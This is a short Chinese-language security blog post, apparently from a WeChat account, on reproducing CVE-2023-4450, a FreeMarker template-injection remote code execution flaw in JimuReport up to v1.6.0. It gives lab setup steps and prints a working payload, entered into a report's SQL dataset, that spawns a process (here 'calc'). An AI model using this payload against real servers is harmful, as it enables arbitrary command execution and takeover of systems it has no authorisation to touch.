CVE-2023-4450 RCE漏洞(附EXP)
2023-8-29 09:0:53
Author: EchoSec(查看原文)
阅读量:295
收藏
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全“设为星标”,否则可能看不到了!
0x01 前言
jeecgboot积木报表系统jimureport(jmreport)是一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖数据报表、打印设计、图表报表、大屏设计等。jimureport
≤ v1.6.0 具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码,控制服务器权限。
文本所需环境已打包好,文末自行获取即可
将jimureport.mysql5.7.create.sql文件导入数据库修改配置文件application.yml(默认root/root)
环境启动成功!
访问地址:http://localhost:8085/jmreport/list新建图表
选择SQL数据集
EXP:
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start ()}
在报表SQL中执行该PAYLOAD
命令执行成功!
回复关键字【20234450】获取下载链接
往期回顾
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文
文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247488121&idx=1&sn=f5f35b0f729ec892f5cc180e1a2815f3&chksm=fcdf4e66cba8c770607198f54a0e0a749fa4e6e407ba8a8bd7c058dfdbe971370b4dfda23e2b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh